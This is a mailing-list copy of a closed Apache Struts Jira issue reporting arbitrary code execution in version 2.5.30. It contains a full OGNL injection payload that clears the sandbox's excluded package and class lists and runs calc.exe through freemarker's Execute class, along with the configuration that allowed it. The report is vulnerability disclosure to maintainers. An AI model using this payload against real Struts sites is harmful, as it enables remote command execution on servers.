You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@struts.apache.org by "Lukasz Lenart (Jira)" <ji...@apache.org> on 2022/07/27 18:55:00 UTC

[jira] [Closed] (WW-5206) OGNL execute arbitrary code

     [ https://issues.apache.org/jira/browse/WW-5206?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Lukasz Lenart closed WW-5206.
-----------------------------
    Resolution: Won't Fix

> OGNL execute arbitrary code
> ---------------------------
>
>                 Key: WW-5206
>                 URL: https://issues.apache.org/jira/browse/WW-5206
>             Project: Struts 2
>          Issue Type: Bug
>          Components: Core
>    Affects Versions: 2.5.30
>            Reporter: Benjamin Lepeigneul
>            Priority: Trivial
>
> Hi,
>  
> I can run arbitrary code with version of struts 2 - 2.5.30.
>  
> +*JSP code :*+
> <s:textarea
> label="%\{getText('information.message.erreur')}"
> id="messageErreurTexte"
> name="formInformation.message"
> cssClass="input-messageErreur"
> value="${pageInformation.message}"
> />
>  
> +*If I write this text in my form input textarea :*+
> %\{(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
> (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
> (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
> (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
> (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
> (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
> (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
> (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
> (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc.exe'}))}
> Whenever the page is displayed, the binary calc.exe is executed.
>  
> My generic struts params :
>  * struts.ognl.allowStaticMethodAccess = true
>  * struts.ognl.expressionMaxLength not set
>  * struts.devMode = false
>  * struts.ui.theme = simple
>  
> Is it normal ?
>  
> Thanks.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)